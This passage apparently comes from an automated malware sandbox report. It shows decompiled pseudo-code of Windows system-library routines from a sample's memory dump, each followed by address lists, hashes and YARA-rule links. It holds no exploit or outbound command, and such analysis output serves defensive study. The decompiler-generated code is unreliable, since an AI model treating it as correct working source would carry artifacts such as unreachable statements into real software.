								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00ACA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                    0x00a8b171
                                                                                                    0x00a8b171
                                                                                                    0x00a8b171
                                                                                                    0x00a8b171
                                                                                                    0x00a8b171
                                                                                                    0x00a8b176
                                                                                                    0x00a8b17b
                                                                                                    0x00a8b180
                                                                                                    0x00a8b186
                                                                                                    0x00a8b18f
                                                                                                    0x00a8b198
                                                                                                    0x00a8b1a4
                                                                                                    0x00a8b1aa
                                                                                                    0x00ae4802
                                                                                                    0x00ae4802
                                                                                                    0x00ae4805
                                                                                                    0x00ae480c
                                                                                                    0x00ae480e
                                                                                                    0x00a8b1d1
                                                                                                    0x00a8b1d3
                                                                                                    0x00a8b1de
                                                                                                    0x00a8b1de
                                                                                                    0x00ae4817
                                                                                                    0x00ae481e
                                                                                                    0x00ae4820
                                                                                                    0x00ae4822
                                                                                                    0x00ae4822
                                                                                                    0x00ae4824
                                                                                                    0x00ae4824
                                                                                                    0x00ae482a
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ae4835
                                                                                                    0x00ae483a
                                                                                                    0x00ae483d
                                                                                                    0x00ae483f
                                                                                                    0x00ae4842
                                                                                                    0x00ae4842
                                                                                                    0x00ae4842
                                                                                                    0x00ae4846
                                                                                                    0x00ae484c
                                                                                                    0x00ae484e
                                                                                                    0x00ae4851
                                                                                                    0x00ae4851
                                                                                                    0x00ae4853
                                                                                                    0x00ae4854
                                                                                                    0x00ae4854
                                                                                                    0x00ae4858
                                                                                                    0x00ae485a
                                                                                                    0x00ae485a
                                                                                                    0x00ae485d
                                                                                                    0x00ae485f
                                                                                                    0x00ae4861
                                                                                                    0x00ae4861
                                                                                                    0x00ae4866
                                                                                                    0x00ae486b
                                                                                                    0x00ae486e
                                                                                                    0x00ae4871
                                                                                                    0x00ae4876
                                                                                                    0x00ae4876
                                                                                                    0x00ae4878
                                                                                                    0x00ae487b
                                                                                                    0x00ae4884
                                                                                                    0x00ae4884
                                                                                                    0x00000000
                                                                                                    0x00ae487d
                                                                                                    0x00ae487d
                                                                                                    0x00ae4882
                                                                                                    0x00ae4889
                                                                                                    0x00ae4889
                                                                                                    0x00ae488f
                                                                                                    0x00ae4891
                                                                                                    0x00ae48e0
                                                                                                    0x00ae48e2
                                                                                                    0x00ae48e4
                                                                                                    0x00ae48e4
                                                                                                    0x00ae48e7
                                                                                                    0x00ae48e7
                                                                                                    0x00ae48ed
                                                                                                    0x00ae48f4
                                                                                                    0x00ae48f6
                                                                                                    0x00ae4951
                                                                                                    0x00ae4951
                                                                                                    0x00ae4953
                                                                                                    0x00ae4953
                                                                                                    0x00ae4956
                                                                                                    0x00ae4956
                                                                                                    0x00ae4958
                                                                                                    0x00ae4959
                                                                                                    0x00ae4959
                                                                                                    0x00ae495d
                                                                                                    0x00ae495d
                                                                                                    0x00ae495f
                                                                                                    0x00ae495f
                                                                                                    0x00ae4965
                                                                                                    0x00ae4969
                                                                                                    0x00ae49ba
                                                                                                    0x00ae49ba
                                                                                                    0x00ae49c1
                                                                                                    0x00ae49c5
                                                                                                    0x00ae49cc
                                                                                                    0x00ae49d4
                                                                                                    0x00ae49d7
                                                                                                    0x00ae49da
                                                                                                    0x00ae49e4
                                                                                                    0x00ae49e5
                                                                                                    0x00ae49f3
                                                                                                    0x00ae4a02
                                                                                                    0x00000000
                                                                                                    0x00ae4a02
                                                                                                    0x00ae4972
                                                                                                    0x00ae4974
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ae4976
                                                                                                    0x00ae4979
                                                                                                    0x00ae4982
                                                                                                    0x00ae4983
                                                                                                    0x00ae4984
                                                                                                    0x00ae498b
                                                                                                    0x00ae498d
                                                                                                    0x00ae4991
                                                                                                    0x00ae4993
                                                                                                    0x00ae4999
                                                                                                    0x00ae499d
                                                                                                    0x00ae49a2
                                                                                                    0x00ae49a2
                                                                                                    0x00ae49a2
                                                                                                    0x00ae4999
                                                                                                    0x00ae49ac
                                                                                                    0x00000000
                                                                                                    0x00ae49b3
                                                                                                    0x00ae48f8
                                                                                                    0x00ae48fe
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ae48fe
                                                                                                    0x00ae4895
                                                                                                    0x00ae489c
                                                                                                    0x00ae48ad
                                                                                                    0x00ae48b2
                                                                                                    0x00ae48b5
                                                                                                    0x00ae48b7
                                                                                                    0x00ae48ba
                                                                                                    0x00ae48bc
                                                                                                    0x00ae48c6
                                                                                                    0x00ae48c6
                                                                                                    0x00ae48cb
                                                                                                    0x00ae48d1
                                                                                                    0x00ae48d4
                                                                                                    0x00ae48d8
                                                                                                    0x00ae48d8
                                                                                                    0x00000000
                                                                                                    0x00ae48d8
                                                                                                    0x00ae48be
                                                                                                    0x00ae48c0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ae48c2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ae48c4
                                                                                                    0x00000000
                                                                                                    0x00ae4882
                                                                                                    0x00ae487b
                                                                                                    0x00ae4904
                                                                                                    0x00ae4906
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ae4908
                                                                                                    0x00ae490e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ae4910
                                                                                                    0x00ae4917
                                                                                                    0x00ae4917
                                                                                                    0x00000000
                                                                                                    0x00ae4917
                                                                                                    0x00a8b1ba
                                                                                                    0x00ae47f9
                                                                                                    0x00ae47fc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ae47fc
                                                                                                    0x00a8b1c0
                                                                                                    0x00a8b1c0
                                                                                                    0x00a8b1c3
                                                                                                    0x00a8b1cb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: _vswprintf_s
                                                                                                    • String ID:
                                                                                                    • API String ID: 677850445-0
                                                                                                    • Opcode ID: 2fabaf598a38f9fe285ef99159d002af18d5972acb84b47a8f12c1191c060408
                                                                                                    • Instruction ID: 2e019ee06b70b51ea05bec25f193bcf580778184b8a7502eee734b24211da1e4
                                                                                                    • Opcode Fuzzy Hash: 2fabaf598a38f9fe285ef99159d002af18d5972acb84b47a8f12c1191c060408
                                                                                                    • Instruction Fuzzy Hash: AF51F071D002998EDB30DF69C945BAEBBB5AF08710F2042ADE859AB282D7354D41CB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AAB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 76%
                                                                                                    			E00AAB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0xb7d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E00AA7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E00B58CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E00AC9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E00ACB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E00ACCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E00AA7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E00B58F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E00ACAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0xb78628; // 0x0
								_v68 = _t77;
								_t78 =  *0xb7862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0xb78628; // 0x0
							_t116 =  *0xb7862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                    0x00aab94c
                                                                                                    0x00aab956
                                                                                                    0x00aab95c
                                                                                                    0x00aab95e
                                                                                                    0x00aab964
                                                                                                    0x00aab969
                                                                                                    0x00aab96d
                                                                                                    0x00aab96d
                                                                                                    0x00aab970
                                                                                                    0x00aab974
                                                                                                    0x00aab97a
                                                                                                    0x00aabadf
                                                                                                    0x00aabadf
                                                                                                    0x00aabae2
                                                                                                    0x00aabae4
                                                                                                    0x00aabae6
                                                                                                    0x00aabaf0
                                                                                                    0x00af2cb8
                                                                                                    0x00aabaf6
                                                                                                    0x00aabaf6
                                                                                                    0x00aabaf6
                                                                                                    0x00aabafd
                                                                                                    0x00aabb1f
                                                                                                    0x00aabb1f
                                                                                                    0x00aabaff
                                                                                                    0x00aabb00
                                                                                                    0x00aabb00
                                                                                                    0x00aabb03
                                                                                                    0x00aabb03
                                                                                                    0x00aabacb
                                                                                                    0x00aabacf
                                                                                                    0x00aabad0
                                                                                                    0x00aabad1
                                                                                                    0x00aabadc
                                                                                                    0x00aabadc
                                                                                                    0x00aab980
                                                                                                    0x00aab980
                                                                                                    0x00aab988
                                                                                                    0x00aab98b
                                                                                                    0x00aab98d
                                                                                                    0x00aab990
                                                                                                    0x00aab993
                                                                                                    0x00aab999
                                                                                                    0x00aab99b
                                                                                                    0x00aab9a1
                                                                                                    0x00aab9a5
                                                                                                    0x00aab9aa
                                                                                                    0x00aab9b0
                                                                                                    0x00aab9bb
                                                                                                    0x00aab9c0
                                                                                                    0x00aab9c3
                                                                                                    0x00aab9ca
                                                                                                    0x00aab9cc
                                                                                                    0x00aab9cf
                                                                                                    0x00aab9d3
                                                                                                    0x00aab9d7
                                                                                                    0x00aaba94
                                                                                                    0x00aaba94
                                                                                                    0x00aaba98
                                                                                                    0x00aabaa3
                                                                                                    0x00af2ccb
                                                                                                    0x00aabaa9
                                                                                                    0x00aabaa9
                                                                                                    0x00aabaa9
                                                                                                    0x00aabab1
                                                                                                    0x00af2cd5
                                                                                                    0x00af2cdd
                                                                                                    0x00af2cdd
                                                                                                    0x00aababb
                                                                                                    0x00aababc
                                                                                                    0x00aabac2
                                                                                                    0x00aabac3
                                                                                                    0x00aabac3
                                                                                                    0x00aabac6
                                                                                                    0x00000000
                                                                                                    0x00aab9dd
                                                                                                    0x00aab9dd
                                                                                                    0x00aab9e7
                                                                                                    0x00aab9e7
                                                                                                    0x00aab9ec
                                                                                                    0x00aab9ec
                                                                                                    0x00aab9f1
                                                                                                    0x00aab9f5
                                                                                                    0x00aab9fa
                                                                                                    0x00aaba00
                                                                                                    0x00aaba0c
                                                                                                    0x00aaba10
                                                                                                    0x00aaba10
                                                                                                    0x00aaba12
                                                                                                    0x00aaba18
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aabb26
                                                                                                    0x00aabb26
                                                                                                    0x00aaba1e
                                                                                                    0x00aaba1e
                                                                                                    0x00aaba23
                                                                                                    0x00aaba25
                                                                                                    0x00aaba2c
                                                                                                    0x00aaba30
                                                                                                    0x00aaba35
                                                                                                    0x00aaba35
                                                                                                    0x00aaba41
                                                                                                    0x00aaba46
                                                                                                    0x00aaba4c
                                                                                                    0x00aaba50
                                                                                                    0x00aaba54
                                                                                                    0x00aaba6a
                                                                                                    0x00aaba6e
                                                                                                    0x00aaba70
                                                                                                    0x00aaba74
                                                                                                    0x00aaba78
                                                                                                    0x00aaba7a
                                                                                                    0x00aaba7c
                                                                                                    0x00aaba8e
                                                                                                    0x00aaba90
                                                                                                    0x00aaba92
                                                                                                    0x00aabb14
                                                                                                    0x00aabb14
                                                                                                    0x00aabb16
                                                                                                    0x00aabb16
                                                                                                    0x00000000
                                                                                                    0x00aaba7c
                                                                                                    0x00aabb0a
                                                                                                    0x00aabb0d
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00aabb0f

                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AAB9A5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID:
                                                                                                    • API String ID: 885266447-0
                                                                                                    • Opcode ID: a2b146e50f83a183fe7f55b864158ba2ba1de878a87bfa5b26815959f7d20255
                                                                                                    • Instruction ID: 0a6a56be53b0f94b2b619f414ab2a90b8071ac8a38d19799ad476faf3005d5bb
                                                                                                    • Opcode Fuzzy Hash: a2b146e50f83a183fe7f55b864158ba2ba1de878a87bfa5b26815959f7d20255
                                                                                                    • Instruction Fuzzy Hash: 7E513671618340CFC720CF69C580A2BBBE5BB89750F24496EF98597396DB31EC44CBA2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B4D466, Relevance: 1.6, APIs: 1, Instructions: 123timeCOMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 67%
                                                                                                    			E00B4D466(signed int __ecx, unsigned int __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v9;
				intOrPtr _v16;
				short _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t53;
				signed int _t67;
				signed char _t75;
				short _t84;
				signed int _t87;
				short* _t89;
				unsigned int _t90;
				signed int _t95;
				void* _t98;
				signed int _t99;

				_v8 =  *0xb7d360 ^ _t99;
				_t90 = __edx;
				_v36 = __ecx;
				_v20 = 0;
				_v40 = __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0xb76114 & 0x0000ffff;
				_v28 = 0;
				_t87 = E00B4DDF9(__edx, _a4, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0xb76114 & 0x0000ffff,  &_v24,  &_v28, __edx >> 0x0000000c & 0x0000ffff ^  *(__edx + 0x18) & 0x0000ffff ^  *0xb76114 & 0x0000ffff,  &_v9);
				_v32 = _t87;
				if(_t87 != 0xffffffff) {
					_t75 =  *(__edx + 0x1c) & 0x000000ff;
					_v20 = 1;
					_v16 = 1;
					 *0xb7b1e0( *__ecx, (_t87 << _t75) + __edx, _v24 << _t75);
					_t53 =  *( *(__ecx + 0xc) ^  *0xb76110 ^ __ecx)();
					_t69 = _t53;
					if(_t53 < 0) {
						_t88 = _v16;
					} else {
						_t69 = 0;
						_t98 = 0;
						_t89 = ( *(__edx + 0x1e) & 0x0000ffff) + __edx + _v32 * 2;
						asm("sbb eax, eax");
						_t67 =  !(_v24 + _v24 + _t89) & _v24 + _v24 >> 0x00000001;
						if(_t67 > 0) {
							_t84 = _v20;
							do {
								if( *_t89 == _t69) {
									 *_t89 = _t84;
								}
								_t89 = _t89 + 2;
								_t98 = _t98 + 1;
							} while (_t98 < _t67);
						}
						goto L2;
						L18:
					}
				} else {
					_t69 = 0;
					L2:
					_t88 = _t69;
				}
				_t95 = _v28;
				if(_t95 != 0) {
					_t95 =  ~(_t95 <<  *(_t90 + 0x1c) >> 0xc);
					asm("lock xadd [eax], esi");
				}
				if(_t88 != 0) {
					_t88 = _a4;
					E00B4D864(_t90, _a4, _v40, 2, 0);
				}
				if(_v20 != 0) {
					E00A9FFB0(_t69, _t90, _t90 + 0xc);
				}
				return E00ACB640(_t69, _t69, _v8 ^ _t99, _t88, _t90, _t95);
				goto L18;
			}

























                                                                                                    0x00b4d475
                                                                                                    0x00b4d47b
                                                                                                    0x00b4d492
                                                                                                    0x00b4d49e
                                                                                                    0x00b4d4a4
                                                                                                    0x00b4d4ac
                                                                                                    0x00b4d4bc
                                                                                                    0x00b4d4be
                                                                                                    0x00b4d4c4
                                                                                                    0x00b4d4cc
                                                                                                    0x00b4d4dc
                                                                                                    0x00b4d4e1
                                                                                                    0x00b4d4f5
                                                                                                    0x00b4d4fb
                                                                                                    0x00b4d4fd
                                                                                                    0x00b4d501
                                                                                                    0x00b4d53d
                                                                                                    0x00b4d503
                                                                                                    0x00b4d507
                                                                                                    0x00b4d50e
                                                                                                    0x00b4d510
                                                                                                    0x00b4d520
                                                                                                    0x00b4d524
                                                                                                    0x00b4d526
                                                                                                    0x00b4d528
                                                                                                    0x00b4d52b
                                                                                                    0x00b4d52e
                                                                                                    0x00b4d530
                                                                                                    0x00b4d530
                                                                                                    0x00b4d533
                                                                                                    0x00b4d536
                                                                                                    0x00b4d537
                                                                                                    0x00b4d53b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00b4d526
                                                                                                    0x00b4d4c6
                                                                                                    0x00b4d4c6
                                                                                                    0x00b4d4c8
                                                                                                    0x00b4d4c8
                                                                                                    0x00b4d4c8
                                                                                                    0x00b4d540
                                                                                                    0x00b4d545
                                                                                                    0x00b4d555
                                                                                                    0x00b4d55a
                                                                                                    0x00b4d55a
                                                                                                    0x00b4d560
                                                                                                    0x00b4d562
                                                                                                    0x00b4d56e
                                                                                                    0x00b4d56e
                                                                                                    0x00b4d577
                                                                                                    0x00b4d57d
                                                                                                    0x00b4d57d
                                                                                                    0x00b4d594
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: DebugPrintTimes
                                                                                                    • String ID:
                                                                                                    • API String ID: 3446177414-0
                                                                                                    • Opcode ID: 4243a0172d68793e103c2d74cd96b17c7abc1bf5a01ef0be0a903fcb1ac1880e
                                                                                                    • Instruction ID: 3f8f4ceae66ab43fd0541813a34394cf7711b386c444f57e742e29f44fc86e2f
                                                                                                    • Opcode Fuzzy Hash: 4243a0172d68793e103c2d74cd96b17c7abc1bf5a01ef0be0a903fcb1ac1880e
                                                                                                    • Instruction Fuzzy Hash: 6A41AF71F001299BCB14DFA9C881ABEB7F9FF88314B55426AE815E7240DB30EE45DB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AC4A2C, Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 58%
                                                                                                    			E00AC4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0xb7d360 ^ _t62;
				_v8 =  *0xb7d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E00AA2280(_t26, 0xb78608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E00A9FFB0(_t41, _t51, 0xb78608);
						L2:
						 *0xb7b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E00ACB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E00AA2280(_t28, 0xb78608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E00A9FFB0(_t42, _t53, 0xb78608);
							if(_t53 != 0) {
								L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E00A9FFB0(_t41, _t51, 0xb78608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                                                                    0x00ac4a2c
                                                                                                    0x00ac4a34
                                                                                                    0x00ac4a3c
                                                                                                    0x00ac4a3e
                                                                                                    0x00ac4a48
                                                                                                    0x00ac4a4b
                                                                                                    0x00ac4a4d
                                                                                                    0x00ac4a51
                                                                                                    0x00ac4a9c
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ac4aa3
                                                                                                    0x00ac4aa8
                                                                                                    0x00ac4aad
                                                                                                    0x00ac4ab1
                                                                                                    0x00ac4ade
                                                                                                    0x00ac4ae3
                                                                                                    0x00ac4a5a
                                                                                                    0x00ac4a62
                                                                                                    0x00ac4a6a
                                                                                                    0x00ac4a6e
                                                                                                    0x00aff203
                                                                                                    0x00ac4a84
                                                                                                    0x00ac4a88
                                                                                                    0x00ac4a89
                                                                                                    0x00ac4a8a
                                                                                                    0x00ac4a95
                                                                                                    0x00ac4a95
                                                                                                    0x00ac4a79
                                                                                                    0x00ac4a80
                                                                                                    0x00ac4af2
                                                                                                    0x00ac4af4
                                                                                                    0x00ac4af9
                                                                                                    0x00ac4aff
                                                                                                    0x00ac4b01
                                                                                                    0x00ac4b03
                                                                                                    0x00ac4b08
                                                                                                    0x00aff20a
                                                                                                    0x00aff212
                                                                                                    0x00aff216
                                                                                                    0x00aff216
                                                                                                    0x00ac4b08
                                                                                                    0x00ac4b13
                                                                                                    0x00ac4b1a
                                                                                                    0x00aff229
                                                                                                    0x00aff229
                                                                                                    0x00ac4b1a
                                                                                                    0x00ac4a82
                                                                                                    0x00000000
                                                                                                    0x00ac4a82
                                                                                                    0x00ac4ab7
                                                                                                    0x00ac4acd
                                                                                                    0x00ac4acd
                                                                                                    0x00ac4ad5
                                                                                                    0x00ac4ada
                                                                                                    0x00000000
                                                                                                    0x00ac4ada
                                                                                                    0x00ac4ac2
                                                                                                    0x00ac4acb
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00ac4acb
                                                                                                    0x00ac4a53
                                                                                                    0x00ac4a53
                                                                                                    0x00ac4a58
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: DebugPrintTimes
                                                                                                    • String ID:
                                                                                                    • API String ID: 3446177414-0
                                                                                                    • Opcode ID: 4b017f4f240ef250678207329a10448907ee9c8a4eaab5d1d37d8ed4225108db
                                                                                                    • Instruction ID: 18a2e3d146e2ccb85c566fba6bca6c7f60eca3389166af30ccaa60cacc5cc5d0
                                                                                                    • Opcode Fuzzy Hash: 4b017f4f240ef250678207329a10448907ee9c8a4eaab5d1d37d8ed4225108db
                                                                                                    • Instruction Fuzzy Hash: B53102322857109FCB219F54CA55F6ABBE4FF89B50F12446DF86A4B691CB70DC00CB89
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00AA0050, Relevance: 1.6, APIs: 1, Instructions: 81timeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 53%
                                                                                                    			E00AA0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0xb7d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E00AB9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
